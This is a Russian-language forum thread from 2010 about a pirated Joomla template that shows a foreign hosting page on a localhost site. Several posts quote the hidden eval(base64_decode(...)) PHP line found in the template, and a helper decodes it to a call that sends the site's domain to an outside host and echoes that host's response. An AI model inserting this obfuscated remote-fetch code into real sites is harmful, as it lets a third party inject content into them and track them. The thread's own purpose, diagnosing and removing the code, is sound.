1. Уважаемые пользователи, прежде чем ответить в теме или создать новую,
    внимательно ознакомьтесь с правилами раздела

    Кому лень работать или руки не оттуда - пользуйтесь услугами специалистов
  2. Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.."

    Есть JED!!! Ищите там!!!

глюк локалхоста? или ...

Тема в разделе "Joomla", создана пользователем Lobo, 9 апр 2010.

Информация :
  • Уважаемые пользователи, прежде чем ответить в теме или создать новую, внимательно ознакомьтесь с правилами раздела
  • Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.." Есть JED!!! Ищите там!!!
  • Аналоги ищите там же - на JED!!!
  • Новая версия? - У кого будет - тот выложит!
Статус темы:
Закрыта.
Модераторы: arman29, DMS, Genk0
  1. Lobo

    Lobo

    Регистр.:
    3 июл 2009
    Сообщения:
    275
    Симпатии:
    2
    Сейчас зашел на локалхост , открыл страницу увидел вот такое окно::eek:
    [​IMG]
    не пойму откуда это , вчера этого еще не было.
    Может кто сталкивался с подобным , или просто знает откуда и почему всплыло это- причины
    Вверху видна картинка крокодила HostGator - это хостинг , но как он влез ко мне на локалхост , и как его убрать отсюда ?
    Подскажите пожалуйста:confused:
     
  2. AHTOH

    AHTOH

    Регистр.:
    22 ноя 2007
    Сообщения:
    160
    Симпатии:
    50
    Я так понимаю это не ваш сайт? Т.е. он стянулся с инета?
    Может шаблон какой платный ставили и он редиректит?
     
  3. o_nix

    o_nix

    Регистр.:
    7 ноя 2007
    Сообщения:
    1.073
    Симпатии:
    1.037
    Lobo - поищи в корневой директории www index.html :)
    его нада удалить :), бывает просто заглушки хостера остаются в папке при переносе с хостинга на локалхост

    пропингуй адрес по которому ты заходиш с www и без возможно у тебы не прописался он на 127.0.0.1 потому и берётся страница с внешнего сервера
     
  4. Lobo

    Lobo

    Регистр.:
    3 июл 2009
    Сообщения:
    275
    Симпатии:
    2
    Нет сайт мой с нуля,это редизайн на уже действующий сайт.

    Добавлено через 11 минут
    o_nix , не могу найти код, смотрю в исходном коде , потом иду в index.php но там этого кода нет.
    Шаблон варезный называется rational-magic уже не помню где скачал может из за этого?
    Примерно какой вид имеет этот код который надо удалить, такой ?
    Код:
    <?php echo eval(base64_decode('ZWNobyBAZmlsZV9nZXRfY29udGVudHMoICJodHRwOi8vc2l0ZWluZmF0LmNvLmNjL
    3RyYWNrZXIucGhwP3RyYWNrPSIudXJsZW5jb2RlKCRfU0VSVkVSWydTRVJWRVJfTkFNRS
    ddKSwgbnVsbCwgc3RyZWFtX2NvbnRleHRfY3JlYXRlKGFycmF5KCdodHRwJz0+YXJyYXko
    J3RpbWVvdXQnPT40LjUpKSkgKTs='));?>
    Добавлено через 16 минут
    Да вроде этот код и был , удалил и сайт открылся.
     
  5. qpr

    qpr Создатель

    Регистр.:
    31 мар 2010
    Сообщения:
    14
    Симпатии:
    0
    Видимо свойственно Joomle. У меня практически при каждой смене шаблонов, появлялись подобные баннеры, но находились в Index. <?php .... ( 'baner').
    Типа того. Первый раз просто паниковал. :)
     
  6. o_nix

    o_nix

    Регистр.:
    7 ноя 2007
    Сообщения:
    1.073
    Симпатии:
    1.037

    PHP:
    echo @file_get_contents"http://siteinfat.co.cc/tracker.php?track=".urlencode($_SERVER['SERVER_NAME']), nullstream_context_create(array('http'=>array('timeout'=>4.5))) );
    Это декодированное
     
  7. Lobo

    Lobo

    Регистр.:
    3 июл 2009
    Сообщения:
    275
    Симпатии:
    2
    o_nix , php код который ты мне написал ,его в index.php нет.
    И еще, скажи пожалуйста , что значит декодирование это значит код раскодирован ,этот код
    Код:
    <?php echo eval(base64_decode('ZWNobyBAZmlsZV9nZXRfY29udGVudHMoICJodHRwOi8vc2l0ZWl
    uZmF0LmNvLmNjL3RyYWNrZXIucGhwP3RyYWNrPSIudXJsZW5jb2
    RlKCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKSwgbnVsbCwgc3Ry
    ZWFtX2NvbnRleHRfY3JlYXRlKGFycmF5KCdodHRwJz0+YXJyYXk
    oJ3RpbWVvdXQnPT40LjUpKSkgKTs='));?>
    
    его нужно прописать обратно?
     
  8. o_nix

    o_nix

    Регистр.:
    7 ноя 2007
    Сообщения:
    1.073
    Симпатии:
    1.037
    "http://siteinfat.co.cc/tracker.php?track=".urlencode($_SERVER['SERVER_NAME'])

    подставь в качестве переменных свой сервер и посмотри что передаётся по этому url с удалённого сервера.
    может быть три варианта кусочек шаблона необходимый для работы, вставка рекламной ссылки, либо это просто контроль того где установленна сборка конкретной cms или шаблона ...
     
  9. Lobo

    Lobo

    Регистр.:
    3 июл 2009
    Сообщения:
    275
    Симпатии:
    2
    Спасибо тебе за внимание o_nix , но чес говоря я не знаю как это выполнить - "...подставь в качестве переменных свой сервер":ah: это значит вставить код ,который ты написал вставить, на сайт который не на локалхосте а в интернете...?
    Сайт на локале отображается корректно только в одном случае ,если я удаляю этот код :
    Код:
    <?php echo eval(base64_decode('ZWNobyBAZmlsZV9nZXRfY29udGVudHMo
    ICJodHRwOi8vc2l0ZWluZmF0LmNvLmNjL3RyYWNrZXIucGhwP3Ry
    YWNrPSIudXJsZW5jb2RlKCRfU0VSVkVSWydTRVJWRVJfTkFNRSdd
    KSwgbnVsbCwgc3RyZWFtX2NvbnRleHRfY3JlYXRlKGFycmF5KCd
    odHRwJz0+YXJyYXkoJ3RpbWVvdXQnPT40LjUpKSkgKTs='));?>
    после того как вставляю его обратно опять появляется та "картина" которую я показывал в первом посте(скрин)
     
  10. o_nix

    o_nix

    Регистр.:
    7 ноя 2007
    Сообщения:
    1.073
    Симпатии:
    1.037

    urlencode
    http://www.php.su/functions/?urlencode

    вот что выдаст если запустить этот скрипт на сайте с доменом test-site.ru
    Запрашивается контент по ссылке http://siteinfat.co.cc/cgi-sys/suspendedpage.cgi?track=test-site.ru

    загрузи в нужное тебе на хостинге место скрипт и запусти? но здаётся мне можно проще :)
    Код:
    http://siteinfat.co.cc/tracker.php?track=domen
    PHP:
    <?php
    $link
    'http://siteinfat.co.cc/tracker.php?track='.urlencode($_SERVER['SERVER_NAME']);
    echo 
    $link;
    ?>
     
Статус темы:
Закрыта.